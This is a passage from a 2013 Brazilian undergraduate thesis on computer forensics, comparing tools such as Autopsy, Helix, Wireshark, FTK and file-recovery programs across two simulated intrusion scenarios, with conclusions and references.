O terceiro programa utilizado foi o Data Recovery, ao inicializa-lo o software
disponibiliza três maneiras diferentes de recuperação de arquivos, o Deleted File Recovery, o
Complete Recovery e o Partition Recovery.
Para este cenário foi utilizado o Complete Recovery, ao ser escolhido esta opção o
programa disponibiliza dentro de um quadro, todos os dispositivos do computador, como por
exemplo, pen drive, HD externo e o próprio HD da máquina. Na Figura 39 é possível
visualizar que foi escolhido o HD da máquina e mostra o início da varredura.
99
Figura 39 – Software Data Recovery.

Fonte: Autor.
Após realizado toda a varredura no HD, o programa abre uma nova janela para
apresentar os resultados retornados, como mostra a Figura 40. Como é possível visualizar, o
arquivo excluído foi encontrado, basta selecioná-lo que o software disponibiliza um espaço
para que o perito escolha o caminho de onde os dados serão armazenados.
Desta forma foi possível fechar o cenário por completo, já que além de comprovar a
invasão, o arquivo excluído foi recuperado com sucesso.
100
Capítulo
101
4 RESULTADOS
Após todos os ataques realizados e as análises feitas pelas ferramentas, a seguir serão
apresentados os resultados separados por cenários, seguindo critérios estabelecidos.
4.1 METODOLOGIA PARA ANÁLISE DOS RESULTADOS
Para fazer uma análise das ferramentas, abaixo serão apresentados os parâmetros
utilizados para gerar os resultados.
• Praticidade para o manuseio da ferramenta: visa comparar a interface

gráfica da ferramenta, ou seja, se a interface é intuitiva de tal forma que auxilie
na busca das informações;
• Quantidade de informações retornadas: a quantia de informações
retornadas, que serviram para esclarecer a invasão;
• Tempo de resposta: se o período gasto para retornar as informações, interfere
na qualidade dos dados e não visa apenas retorná-los em um curto espaço de
tempo; e
• Dificuldade na análise da informação: visa tratar a dificuldade quanto à
análise da informação retornada, ou seja, se os dados apresentados são de fácil
leitura, ou se precisa de algum tipo de tratamento para que se torne legível.
4.2 CENÁRIO 01
Conforme visto no cenário 01, as ferramentas utilizadas foram o Autopsy, live cd do

Helix, o analisador de protocolos Wireshark e o software de varredura do Kaspersky, Security
Scan.
102
Para cada um dos requisitos de análise destas ferramentas, será gerado um resultado
independente, mostrando seu desempenho comparando com as demais ferramentas utilizadas,
veja a seguir os parâmetros:
4.2.1 Praticidade para o Manuseio da Ferramenta
Para este quesito foi levado em consideração à interface gráfica da ferramenta, de tal
forma que veio a agilizar e contribuir para uma melhor investigação, além da disposição em
que as informações se encontram na tela.
A ferramenta Autopsy teve como resultado para este primeiro quesito, uma resposta
positiva, já que sua interface é bastante intuitiva, as informações que estão disponíveis na tela
são bastante objetivas o que acaba facilitando e agilizando na busca das informações.
O analisador de protocolos Wireshark teve um resultado não muito positivo, apesar de
sua interface ser intuitiva, sua utilização é dificultada já que o investigador que a estiver
manipulando deve possuir certo conhecimento sobre o funcionamento da rede, porém, chega a
ser uma ferramenta indispensável para o perito durante a análise do tráfego da rede.
O live cd do Helix teve como resultado esperado uma resposta muito satisfatória, já
que sua ferramenta é bastante fácil de utilizar, a interface é bastante intuitiva, o conjunto de
ferramentas contidas nele é separado por assuntos distintos, dessa maneira agiliza e garante
uma boa coleta e análise dessas informações.
O software de varredura Security Scan do Kaspersky é bastante intuitivo e prático no
momento de manipulá-la, não exigindo muito, já que todo o seu resultado é apresentado de
maneira clara e bastante objetiva, desta forma colaborando com o perito durante a exposição
dos resultados em seu relatório.
4.2.2 Quantidade de Informações Retornadas
Para este quesito foi levado em consideração a quantidade de informações retornadas

no momento do processo de análise, e sua relevância quanto ao caso.
103
A ferramenta Autopsy neste quesito teve um resultado negativo, já que para o processo
de obtenção da informação, a técnica utilizada precisava reiniciar o computador alvo. Tal
procedimento causava a perda das informações necessárias para a investigação já que neste
cenário o tipo de ataque utilizado era apenas de monitoramento, então as informações do
tráfego de rede, foram perdidos. Como foi mostrado durante o capítulo dois, este tipo de
análise deveria ter sido realizada com o computador ligado (Live Analisys), já que as
informações que se perderam, eram voláteis e no momento que o computador foi reiniciado
os dados deixaram de existir.
O analisador de protocolos Wireshark neste quesito obteve bons resultados, trouxe
uma grande quantidade de informações, onde ele mostra o início da comunicação entre os
dois computadores e apresenta também, os dados que estão sendo trafegados na rede durante
esta comunicação.
O live cd do Helix obteve também bons resultados, já que trazia um prompt de
comando próprio, onde todos os procedimentos eram realizados dentro da máquina, além de
possuir um volume aceitável de informações retornadas que auxiliaram o esclarecimento com
relação à invasão e também, garantiu a confiabilidade da informação, o que para uma
investigação é essencial.
O software de varredura Security Scan do Kaspersky, para o cenário 01, como foi
utilizado uma verificação rápida, a quantidade de informação foi pequeno, porém, mesmo
com esta quantidade de dados foi possível comprovar que existiu realmente a invasão e qual
método utilizado pelo invasor.
4.2.3 Tempo de Reposta da Ferramenta
Para este quesito foi levado em consideração se a ferramenta levou muito tempo para
retornar uma reposta no momento da análise e se este tempo interferiu na qualidade dos
dados.
Como a ferramenta Autopsy não obteve nenhuma informação, já que apresentou
problemas em capturar as informações relacionadas ao tráfego da rede, não será levada em
consideração referente a este quesito.
A ferramenta Helix levou um minuto a menos que o analisador Wireshark, porém o
uso das duas ferramentas foram rápidas, já que foi realizado apenas uma análise do tráfego da
104
rede. E as informações que retornaram foram muito importantes para a análise forense, onde
foi possível comprovar que existiu a invasão e estava sendo mantido uma comunicação entre
os computadores.
E por último a ferramenta de varredura Security Scan do Kaspersky, precisou de uma
hora e meio para buscar todas as vulnerabilidades no computador alvo. A demora comparada
em relação com as outras ferramentas é de que as demais manipularam dados já prontos,
enquanto que o Security Scan precisou realizar uma varredura no HD, para que depois
retorna-se as informações, cujo os dados também foram importantes para a investigação, já
que foi possível comprovar qual técnica utilizada pelo invasor.
Na Figura 40 é possível visualizar o gráfico que apresenta o tempo de resposta das
ferramentas. Tais resultados foram baseados dentro dos cenários criados, ou seja, o sistema
operacional estava sendo virtualizado, podendo obter resultados diferentes caso os testes
sejam realizados em uma máquina melhor.
Tempo de Reposta
5
4
Minutos
3
Tempo
2
1
0
Autopsy Wireshark Helix Security
Scan
Ferramentas
Figura 40 – Gráfico com o tempo de resposta das ferramentas.

Fonte: Autor.
4.2.4 Dificuldade na Análise das Informações
Para este quesito foi levado em consideração a dificuldade quanto à análise da

informação retornada, ou seja, se os dados apresentados são de fácil leitura, ou se precisa de
algum tipo de tratamento para que se torne legível.
105
A primeira ferramenta a ser considerada seria o Autopsy, porém, como não existiu
nenhum tipo de resultado, avaliá-la neste cenário não foi possível.
O analisador de protocolos Wireshark, foi à ferramenta mais complexa e que exigia
um maior conhecimento do perito, já que os dados estavam no formato TCP, ou seja, as
informações contidas nos pacotes de transmissão seguiam o padrão deste protocolo (Figura
41), dificultando assim sua utilização, por exigir um tratamento dos dados, sendo assim
demandando um pouco mais de tempo para a extração de informações mais legíveis.
O live cd do Helix teve neste quesito também uma boa resposta, já que suas
informações foram bastante claras e sua interface gráfica por ser intuitiva não exigiu do
perito, o que acaba facilitando e tornando mais ágil o processo de investigação.
O software de varredura Security Scan do Kaspersky, não apresentou grandes
dificuldades na interpretação das informações retornadas, pois a ferramenta é bem intuitiva e
seu relatório contem as informações separadas por grupos de interesses, assim não criando
grandes problemas em sua análise.
Figura 41 – Informação contida dentro dos pacotes do protocolo TCP.

Fonte: Autor.
106
4.3 CENÁRIO 02
Conforme visto no cenário 02, as ferramentas utilizadas foram o Autopsy, live cd do

Helix¸ o Forensic Toolkit que está contido dentro do Helix e o Security Scan.
Também foi utilizado três ferramentas para realizar a busca e recuperação do arquivo
excluído durante a invasão, o software EaseUS Partition Recorey, FreeRecover e Data
Recovery.
Os quesitos para avaliação das ferramentas são apresentados a seguir.
4.3.1 Praticidade para o Manuseio da Ferramenta
Para este quesito foi levado em consideração à interface gráfica da ferramenta, de tal
forma que veio a agilizar e contribuir para uma melhor investigação, além da disposição em
que as informações se encontram na tela.
A ferramenta Autopsy teve como resultado para este segundo cenário, uma resposta
positiva, já que sua interface foi bastante intuitiva, as informações que estão disponibilizadas
na tela são bem claras, o que facilita no momento da investigação. Tais resultados obtidos
foram muito melhores do que os encontrados no cenário 01.
O live cd do Helix também obteve resultados satisfatórios assim como encontrados no
cenário 01, com apenas uma ressalva, existiu algum problema que não foi possível de detectar
para que pudesse dar continuidade na utilização da ferramenta.
A ferramenta Forensic Toolkit, obteve resultados muito satisfatórios, já que sua
interface é fácil de ser manuseada, as informações que estão disponíveis no seu ambiente
gráfico é bastante intuitivo, assim ajudando no momento da análise.
O software de varredura Security Scan do Kaspersky é bastante intuitivo, desta forma
seu retorno obtido foram os mesmo já tratados nos resultados do cenário 01.
Os três softwares para a recuperação do arquivo excluído, EaseUS Partition Recorey,
FreeRecover e Data Recovery, obtiveram bons resultados, pois a utilização não apresentou
grandes problemas, por possuírem ambientes gráficos intuitivos, já que a disposição das
informações na tela são bastante claras.
107
4.3.2 Quantidade de Informações Retornadas
Para este quesito foi levado em consideração a quantidade de informações retornadas

no momento do processo de análise, e sua relevância quanto ao caso.
A ferramenta Autopsy neste quesito diferentemente do primeiro cenário, obteve bons
resultados. Trouxe uma quantidade considerável de informações, de maneira organizada e
bem intuitiva, sendo assim, o uso desta ferramenta foi bastante relevante nesta investigação.
O live cd do Helix, diferente do cenário 01, não obteve bons resultados, já que por
algum problema desconhecido não foi possível gerar a aquisição da imagem, assim não
realizando nenhum teste em cima dos dados. Foram realizados novos testes para visualizar se
o problema era temporário, porém, o erro persistiu mesmo reiniciando a ferramenta.
A ferramenta Forensic Toolkit, obteve resultados muito satisfatórios, pois assim como
o Autopsy trouxe as informações separadas por pastas especificas, facilitando a análise
pericial e também sendo relevante ao caso.
O software de varredura Security Scan do Kaspersky, para este cenário foi retornado
uma quantidade considerável de dados em comparação com o cenário 01, contendo as
informações necessárias para a comprovação de que existiu realmente a invasão e qual
método utilizado.
O programa EaseUS Partition Recorey, retornou uma quantia considerável de dados,
porém, nenhuma das informações foram possíveis de serem recuperadas de maneira efetiva,
ou seja, a ferramenta não disponibiliza a chance de recuperar o arquivo, apenas apresenta-o de
maneira visual dentro do seu ambiente gráfico.
A repostas retornadas pelo FreeRecover não foram muitas, e também não foi possível
utilizar nenhuma informação, já que o arquivo que estava sendo procurado não foi
encontrado, sendo assim, a ferramenta não apresentou ser eficiente para este cenário.
A ferramenta Data Recovery, obteve bons resultados, já que trouxe uma quantia
considerável de informações, além de fornecer a opção de salvar os dados onde o investigador
preferir, desta maneira, diferentemente das outras duas ferramentas de recuperação de
arquivo, este software se mostrou relevante e eficiente para este cenário.
108
4.3.3 Tempo de Reposta da Ferramenta
Para este quesito foi levado em consideração se a ferramenta levou muito tempo para
retornar uma reposta no momento da análise e se este tempo interferiu na qualidade dos
dados.
Como o processo de aquisição da mídia teve que ser feita obtendo outros métodos não
disponíveis na própria ferramenta Autopsy, seu tempo de resposta para gerar os resultados foi
prolongado, porém, não chegou a interferir nos resultados, apesar de ter sido gasto sete horas
e cinquenta minutos.
A ferramenta Helix¸ por sua vez, não trouxe nenhum resultado para este requisito
devido aos problemas para a obtenção dos dados.
Já a ferramenta FTK, obteve o menor tempo para adquirir a imagem da mídia, com
duas horas e quarenta minutos, e assim como a ferramenta Autopsy, seu tempo de resposta
não influenciou na qualidade das informações.
E por último a ferramenta de varredura Security Scan do Kaspersky, precisou de cinco
horas e vinte minutos para buscar todas as vulnerabilidades no computador alvo. Apesar de
ser uma varredura, precisou de um tempo maior que a utilizada pela ferramenta FTK para a
aquisição do HD, assim como as outras duas ferramentas, o tempo gasto não influenciou na
qualidade.
E dentro do tempo para as ferramentas de recuperação de arquivos, o software Data
Recovery, foi o que gastou mais tempo, uma hora e três minutos, porém foi a única ferramenta
que atingiu as expectativas do investigador, onde o tempo gasto para o retorno das
informações não afetou na qualidade das informações.
A ferramenta EaseUS Partition Recorey, gastou vinte e cinco minutos para fazer a
varredura, porém só deu a possibilidade de visualizar o arquivo dentro do seu próprio
ambiente gráfico, diferentemente da outra ferramenta, a rapidez no retorno das informações
acabou não agregando um valor real para a investigação.
Já a ferramenta FreeRecover, obteve o menor tempo, já que levou apenas um minuto
para fazer a varredura, porém, seus resultados não foram aproveitados. Assim o uso desta
ferramenta para o presente cenário acabou não agregando nenhum valor, pois além de não
trazer de maneira física a informação que estava sendo procurada, o software também não traz
nenhum dado na sua interface gráfica.
109
Na Figura 42 é possível visualizar o gráfico que apresenta o tempo de resposta das

ferramentas. Tais resultados foram baseados dentro dos cenários criados, ou seja, o sistema
operacional estava sendo virtualizado, podendo obter resultados diferentes caso seja realizado
em uma máquina melhor.
Tempo de Reposta Tempo

10
9
8
7
6
Horas
5
4
3
2
1
0
US
y
r
lix
n
y
er
ps
a
FT
ov
He
Sc
se
ov
to
c
Ea
ity
Re
Au
c
Re
r
ee
cu
ta
Fr
Se
Da
Ferramentas
Figura 42 – Gráfico com o tempo de resposta das ferramentas.

Fonte: Autor.
4.3.4 Dificuldade na Análise das Informações
Para este quesito foi levado em consideração a dificuldade quanto à análise da

informação retornada, ou seja, se os dados apresentados são de fácil leitura, ou se precisa de
algum tipo de tratamento para que se torne legível.
A ferramenta Autopsy, diferentemente do primeiro cenário quando não retornou
informações, neste cenário dois obteve excelentes resultados, pois, suas informações além de
estarem organizadas por pastas, a sua interface facilita a busca de um único dado, se for
110
preciso. Sendo assim, ao se utilizar esta ferramenta não foi necessário realizar nenhum
tratamento nas informações retornadas, o que facilita no momento de uma investigação.
Neste cenário a ferramenta Helix, não retornou nenhum resultado, devido aos
problemas desconhecidos ocasionados no momento de aquisição da imagem do HD.
O FTK trouxe as informações de maneira correta, exceto por uma pequena dificuldade
no momento de abrir o arquivo gerado da cópia do HD, pois, existiam arquivos fragmentados,
assim tendo que ser analisado de maneira individual, dificultando e atrasando um pouco a
investigação.
O software de varredura Security Scan do Kaspersky, não apresentou grandes
dificuldades na interpretação das informações retornadas, desta maneira seus resultados
relacionados a este quesito foram iguais aos encontrados no cenário 01.
Os softwares Data Recovery, EaseUS Partition Recorey e FreeRecover, não
apresentaram muitas dificuldades na análise das informações retornadas, já que todos os
dados retornados, seja no ambiente gráfico ou de maneira física, são legíveis e não exigindo
muito do perito.
Capítulo
111
5 CONCLUSÕES
A informação vem ganhando cada vez mais valor nos dias atuais, sendo tanto no meio
organizacional quanto para usuários domésticos, tal fato tem acontecido pela facilidade na
comunicação, já que para se conectar a Internet não é preciso possuir desktops como
antigamente, basta ter em mãos um pequeno dispositivo móvel que dê suporte para esta
tecnologia.
Sabendo de toda esta facilidade, os criminosos têm migrado para este mundo também,
cometendo crimes de pedofilia, roubo de informações, espionagem industrial entre outros. Ao
navegar por este mundo virtual, muitos usuários não sabem ou esquecem de se proteger,
tornando-se assim alvos fáceis para tais criminosos.
Ainda não existem muitas leis para os crimes cometidos no mundo virtual, como foi
mostrado, o Brasil possui apenas duas leis voltadas para cibercrimes, que são as: práticas
contra os sistemas informatizados e invasão de dispositivo informático. Apesar de serem
apenas duas leis, elas conseguem abrangir uma boa parte dos crimes cometidos, mas, só estas
não são o suficiente para o crescimento que vem acontecendo.
Muitos desses delitos contam com a “ingenuidade” do usuário, como foi demonstrado
no cenário 01, onde foi preciso que a pessoa aceitasse uma foto, um vídeo ou uma música
qualquer para que o invasor conseguisse a posse parcial, em seguida ele efetuaria a escalada
de privilégios até que atingisse o total controle da máquina.
A perícia forense computacional vem para descobrir e resolver os casos de invasões e
crimes de tal espécie. Neste trabalho foi apresentada a metodologia utilizada pelo investigador
para dar início à análise, ou seja, mostrou que é preciso identificar e coletar as informações
mais relevantes ao caso. Como esses dois passos é o que dá início a uma investigação, acaba
sendo muito importantes, já que se não existir a identificação e uma boa coleta das
informações, a chance de fracassar é grande. O perito também precisa preservar os dados de
maneira segura, em seguida analisá-los e só então apresentar os resultados para um terceiro.
Para auxiliar neste processo, foi demonstrado um comparativo entre as ferramentas
utilizadas e as técnicas que o investigador faz uso no momento de uma perícia, além de trazer
uma vasta coleção de outras ferramentas e softwares que estão separadas por grupos.
112
Muitas destas ferramentas apresentadas possuem um valor aquisitivo elevado, o que

impossibilitou de utilizá-las, porém, suas funcionalidades também são interessantes e podendo
ser muito importantes no momento de uma investigação.
Dentre as ferramentas utilizadas nos cenários, a que ganhou maior destaque foi o
conjunto de ferramentas disponibilizadas no live cd do Helix, outra ferramenta que também
obteve destaque foi o varredor de vulnerabilidades, Security Scan, já que demonstrou ser
bastante completa e clara no momento de apresentar as informações.
As demais ferramentas apesar de não terem sido escolhidas pelo autor, sendo por
dificuldades apresentadas durante a análise, não significa que perderam seu valor para
colaborar com a confirmação de que existiu uma invasão, apenas que estes softwares
poderiam trazer melhores resultados em outros tipos de cenários.
O desempenho apresentado em todas as ferramentas poderiam ter sido melhores se o
ambiente físico fosse especialmente preparado ou então com um poder computacional
superior, já que para a execução deste trabalho o computador utilizado possuía recursos
limitados, o que acaba afetando diretamente no desempenho de cada um dos softwares.
Como foi possível visualizar durante os estudos de caso, a utilização de uma única
ferramenta não é recomendável, já que ao utilizar dois softwares, um acaba complementando
os resultados obtidos no outro, criando assim uma maior redundância durante a apresentação
das informações geradas, além de garantir um relatório mais concreto sobre a perícia
efetuada.
O número de incidentes de segurança seria menor se existisse uma maior
conscientização sobre os riscos no uso da Internet, já que ao dificultar a entrada do invasor,
ele se sentiria desmotivado em continuar, tentando encontrar um alvo mais vulnerável. Porém,
como foi demonstrado no cenário 02, existem muitos programas disponíveis na Internet ou
softwares que utilizam algum dispositivo que apresenta vulnerabilidades, assim dando a
oportunidade de invasão realizados por um cracker. Concluindo-se então, que não existem
computadores totalmente seguros, existem apenas, aqueles que não foram invadidos ainda.
5.1 TRABALHOS FUTUROS
Como trabalho futuro, além da comparação das ferramentas que já foi visto neste
documento, recomenda-se o aumento na quantidade de ferramentas utilizadas nos cenários,
113
uma investigação de onde partiu os ataques, os mecanismos mais apropriados para sua defesa
e dicas para evitar as mesmas ou novas invasões.
E acompanhando a tendência do mercado, buscar novas ferramentas que encontre
invasões ou danos envolvendo smartphones.
Buscando assim englobar a maior quantidade de conhecimento a fim de prevenir e
educar os usuários mais leigos, tanto no meio empresarial, quanto doméstico.
115
REFERÊNCIAS
ARGOLO, Frederico Henrique Böhm. Análise forense em sistemas GNU/Linux. Trabalho

de Conclusão de Curso (Ensino Médio) - Ufrj, Rio de Janeiro, 2005.
ASSOCIAÇÃO BRASILEIRA DE NORMAS TÉCNICAS. (2005). NBR ISO/IEC 27002:

Código de prática para a gestão da segurança da informação. Rio de Janeiro: ABNT, 2005.
BARROS, Eduardo Gomes de. Elementos básicos de perícia forense computacional. 2009.
Disponível em: <http://pt.pdfsb.com/manual+de+computacion+forense>. Acesso em: 26 de
fev. 2013
BRASIL. Decreto n. 12735, de 30 de nov.2012. Dispõe sobre a salvaguarda de dados,

informações, documentos e materiais sigilosos de interesse da segurança da sociedade e do
Estado, no âmbito da Administração Pública Federal, e dá outras providências. Diário Oficial
União, Brasília, 30 de nov.2012.
BRASIL. Decreto n. 12737, de 30 de nov.2012. Dispõe sobre a salvaguarda de dados,

informações, documentos e materiais sigilosos de interesse da segurança da sociedade e do
Estado, no âmbito da Administração Pública Federal, e dá outras providências. Diário Oficial
União, Brasília, 30 de nov.2012.
CAIS (2013) Estatísticas de Incidentes Reportados ao CAIS por ano. Disponível em:
<http://www.rnp.br/cais/estatisticas/index.php>. Acesso em: 17 jun. 2013
CASTELLS, Manuel. Lições da história da Internet. In: CASTELLS, Manuel. A galáxia da

Internet: reflexões sobre a Internet, os negócios e a sociedade. Rio de Janeiro: Jorge Zahar
Editor, 2003. p. 13-33. Disponível em:
<http://books.google.com.br/books?id=nCKFFmWOnNYC&printsec=frontcover&dq=a+gal
%C3%A1xia+internet&hl=pt-
%20R&sa=X&ei=r7nxUNX2GIbm8QTftIFo&ved=0CDkQ6wEwAA#v=onepage&q&f=false
>. Acesso em: 26 out. 2012.
CERT.br (2013a). Estatísticas total de incidentes reportados ao CERT.br por ano. Disponível
em: <http://www.cert.br/stats/incidentes/#2013>. Acesso em: 17 jun, 2013.
CERT.br (2013b). Estatísticas de incidentes reportados ao CERT.br por dia da semana.

Disponível em: <http://www.cert.br/stats/incidentes/2013-jan-mar/weekdays-
incidentes.html>. Acesso em: 17 jun, 2013.
CERT.br (2013c). Estatísticas de incidentes reportados ao CERT.br de tipos de ataques.

Disponível em: <http://www.cert.br/stats/incidentes/2013-jan-mar/tipos-ataque.html>. Acesso
em: 17 jun. 2013.
CERT.br (2013d). Estatísticas de incidentes reportados ao CERT.br de tentativas de fraudes.

Disponível em: <http://www.cert.br/stats/incidentes/2013-jan-mar/fraude.html>. Acesso em:
17 jun, 2013.
116
FAIRBANKS, Kevin D.; LEE, Christopher P.; OWENS, Henry L. Forensic Implications of
Ext4. Atlanta: GA, 2010.
FARMER, Dan; VENEMA, Wietse. Perícia forense computacional: teoria e prática

aplicada. São Paulo: Pearson Prentice Hall, 2007.
FREITAS, Andrey Rodrigues de. Perícia aplicada a informática: ambiente Microsoft. Rio
de Janeiro: Brasport, 2006. Disponível em: <http://books.google.com.br/books?id=HT-
MhC3RxR0C&printsec=frontcover&dq=pericia+forense+computacional+para+windows&hl
=pt-BR&sa=X&ei=-
qP1UJ3AEYi69gSd9oHYCA&ved=0CD8Q6AEwAQ#v=onepage&q&f=false>. Acesso em:
15 jan. 2013.
GALVÃO, Ricardo Kléber M.. Perícia forense computacional. In: SEGINFO2009, IV., 2009,
Rio de Janeiro. Workshop de segurança da informação. Rio de Janeiro: _, 2009. p. 1 - 123.
MacAfee – Relatório de ameaças no terceiro trimestre de 2012. Disponível em:

<http://www.mcafee.com/us/business-home.aspx>. Acesso em: 27 jan. 2013
MELO, Sandro. Computação forense com software livre: conceitos, técnicas, ferramentas e
estudos de casos. Rio de Janeiro: Alta Books, 2009.
MORAZ, Eduardo. Desvendando os recursos do novo Windows 7: novas funções, recursos

inéditos, maior desempenho, mais customizável. São Paulo: Digerati Books, 2009. Disponível
em:
<http://books.google.com.br/books?id=pqSw8z55ALoC&pg=PA16&dq=sistemas+de+arquiv
os+do+Windows&hl=pt-
PT&sa=X&ei=mG4AUZyPL5Di8gSos4HQAw&ved=0CD4Q6AEwAg#v=onepage&q&f=fal
se>. Acesso em: 24 jan. 2013.
MORIMOTO, Carlos E.. Hardware: o guia definitivo. [S/l]: Gdh Press e Sul Editores, 2007.
848 p. Disponível em: <http://www.hardware.com.br/livros/hardware/>. Acesso em: 24 jan.
2013.
NOBRE, J. C. A.. Ameaças e ataques aos sistemas de informação: prevenir e antecipar.

Cadernos UniFOA, Volta Redonda, ano 2, n°. 5, dezembro 2007. Disponível em:
<http://www.foa.org.br/cadernos/edicao/05/11.pdf>. Acesso em: 26 jan. 2013.
OLHAR DIGITAL – Site do Enem sofre ataques de hackers. Disponível em:

<http://olhardigital.uol.com.br/jovem/digital_news/noticias/site-do-enem-sofre-ataques-de-
hackers>. Acesso em 30 maio 2013.
OLIVEIRA, Rômulo Silva de; CARISSIMI, Alexandre da Silva; TOSCANI, Simão

Sirineo. Sistemas operacionais: novas funções, recursos inéditos, maior desempenho, mais
customizável. 4 ed. Porto Alegre: Bookman, 2010. (Livros didáticos informática; n. 11).
Disponível em:
<http://books.google.com.br/books?id=9SdddkKFtlYC&pg=PA261&dq=sistemas+de+arquiv
os+do+Linux&hl=pt-PT&sa=X&ei=uGoAUY_aOZT69gSQ-
IGQDQ&ved=0CEEQ6AEwAQ#v=onepage&q&f=false>. Acesso em: 24 jan. 2013.
117
PERÍCIA FORENSE COMPUTACIONAL: metodologias e ferramentas periciais. [S/l]:

Evidência Digital Magazine, 2011. Disponível em:
<http://www.guiatecnico.com.br/EvidenciaDigital/>. Acesso em: 15 jan. 2013.
PLANALTO, 2012. Práticas contra os sistemas informatizados. Disponível em:

<http://www.planalto.gov.br/ccivil_03/_Ato2011-2014/2012/Lei/L12735.htm>. Acessado em:
21 maio 2013.
PLANALTO, 2012. Invasão de dispositivo informático. Disponível em: <

http://www.planalto.gov.br/ccivil_03/_ato2011-2014/2012/lei/l12737.htm>. Acessado em: 21
maio 2013.
REIS, Marcelo Abdalla dos; GEUS, Paluo Lício de. Análise forense de intrusões em
sistemas computacionais: técnicas, procedimentos e ferramentas. [S/l]. (2002).
ROHRMANN, Carlos Alberto. Curso de direito virtual. Belo Horizonte: Del Rey, 2005.
290 p. Disponível em:
<http://books.google.com.br/books?id=CSfQSpKvJ20C&pg=PA121&dq=Crimes+de+Inform
%C3%A1tica+e+seus+Aspectos+Processuais&hl=pt-
PT&sa=X&ei=tFEIUdDbKc7v0QGfroCYAQ&ved=0CDYQ6AEwAQ#v=onepage&q&f=fal
se>. Acesso em: 29 jan. 2013.
SOUZA NETO, Pedro Américo de. Crimes de informática. 2009. 77 f. Dissertação

(Mestrado) - Univali, Itajaí, 2009. Disponível em:
<http://siaibib01.univali.br/pdf/Pedro%20Americo%20de%20Souza%20Neto.pdf>. Acesso
em: 30 jan. 2013.
STEWART, James Michael; TITEL, Ed; CHAPPLE, Mike. Certified information systems
security professional. Study Guide.4.ed. Indiana: Wiley, 2008.
TANENBAUM, Andrew S.. Introdução. In: TANENBAUM, Andrew S.. Redes de

Computadores. 4. ed. Rio de Janeiro: Campus, 2003. p. 1-89.
ULBRICH, Henrique Cesar; DELLA VALLE, James. Universidade Hacker: Desvende

todos os segredos do submundo dos hackers. 5 ed. São Paulo: Digerati Books, 2006. 352 p.
Disponível em:
<http://books.google.com.br/books?id=J2TZTcIBPLEC&printsec=frontcover&dq=universida
de+hacker&hl=pt-
PT&sa=X&ei=l30AUZO8NpCQ8wSm14C4CQ&ved=0CDkQ6wEwAA#v=onepage&q&f=f
alse>. Acesso em: 19 dez. 2012.

2013 - 1sem - Sebastião Garcia Torres Filho PDF

Enviado por

Dados do documento

Título original

Direitos autorais

Formatos disponíveis

Compartilhar este documento

Compartilhar ou incorporar documento

Opções de compartilhamento

Você considera este documento útil?

Este conteúdo é inapropriado?

Direitos autorais:

Formatos disponíveis

2013 - 1sem - Sebastião Garcia Torres Filho PDF

Enviado por

Direitos autorais:

Formatos disponíveis

INSTITUTO FEDERAL DE CIÊNCIA E TECNONOLOGIA DE SÃO PAULO

CÂMPUS SÃO JOÃO DA BOA VISTA

SEBASTIÃO GARCIA TORRES FILHO

Perícia Forense Computacional: levantamento e comparação de técnicas e

São João da Boa Vista

Perícia Forense Computacional: levantamento e comparação de técnicas e

Trabalho de conclusão de curso apresentado ao Instituto Federal

Área de Concentração: Perícia Forense Computacional

Orientador: Prof. Roan Simões da Silva

São João da Boa Vista

Ficha catalográfica preparada pela Seção de Tratamento

Trabalho de Conclusão de Curso, IFSP, 2013.

1. Internet. 2. Segurança. 3. Ataques. Perícia

I. Perícia Forense: levantamento e comparação de

todos os detalhes referentes à norma.

cansar e nunca pensar em desistir, o verdadeiro espírito de campeões.

FILHO, Sebastião G. T. (2013). Perícia Forense Computacional: levantamento e

A Internet se tornou muito popular no Brasil e no mundo, esta popularidade se deu

Palavras-chave: Internet. Segurança. Ataques. Perícia Forense.

Keywords: Internet. Security. Attacks. Forensics.

Tabela 1 - Expectativa esperada pelos dados. ............................................... 40

AIR Automated Image and Restore – Restauração e Automatização de

ARPA Advanced Research Projects – Agência de Pesquisa de Projetos

ATA Advanced Technology Attachment – Acessório de Tecnologia

CAIS Centro de Atendimento a Incidentes de Segurança

CD-ROM Compact Disc-Read Only Memory – Disco Compacto – Memória

CERT.br Centro de Estudos, Repostas e Tratamento de Incidentes de Segurança

DNS Domain Name System – Sistema de Nomes de Domínio

DoS Denial of Service – Negação de Serviço

DVD Digital Video Disc – Disco Digital de Vídeo

ENEM Exame Nacional do Ensino Médio

Ext Extended File System – Sistema de Arquivos Alargados

FAT File Allocation Table – Tabela de Alocação de Ficheiros

FTK Forensic Toolkit – Kit de Ferramentas Forenses

HD Hard Disk – Disco Rígido

HTML HyperText Markup Language – Linguagem de Marcação de

HTTP HyperText Transfer Protocol – Protocolo de Transferência de

IMP Interface Message Protocol – Protocolo de mensagens de interface

NTFS New Technology File System – Nova Tecnologia em Sistema de

PDA Personal Digital Assistants – Assistente Pessoal Digital

PDF Portable Document Format – Formato de Arquivo Portável

PNG Portable Network Graphics - Gráfico de Rede Portátil

RAM Random Access Memory – Memória de Acesso Aleatório

RNP Rede Nacional de Ensino e Pesquisa

SATA Serial Advanced Technology Attachment – Acessório de Tecnologia

SCSI Small Computer System Interface – Interface Pequena para Sistema

SOP Standard Operating Procedures – Procedimentos Operacionais

TCP/IP Transmission Control Protocol/Internet Protocol – (Protocolo de

URI Uniform Resource Identifier – Identificador Uniforme de Recursos

URL Uniform Resource Locator – Localizador Padrão de Recursos Padrão

USB Universal Serial Bus – Barramento Universal Serial

1.1 MOTIVAÇÃO ...................................................................................................................... 24

1.2 OBJETIVOS ......................................................................................................................... 26

1.3 ORGANIZAÇÃO DESTE TRABALHO ............................................................................. 26

2 PESQUISA BIBLIOGRÁFICA ............................................................................. 27

2.1 A INTERNET E SEU FUNCIONAMENTO ....................................................................... 27

2.2 A IMPORTÂNCIA DA SEGURANÇA DA INFORMAÇÃO ............................................ 32

2.3 PERÍCIA FORENSE ............................................................................................................ 34

2.3.1 Coleta das Informações ................................................................................................... 35

2.3.2 Volatilidade da Informação............................................................................................. 39

2.3.3 Sistemas de Arquivos ....................................................................................................... 40

2.3.3.1 Sistema de Arquivos GNU/Linux ................................................................................. 41

2.3.3.2 Sistema de Arquivos Windows™ ................................................................................. 43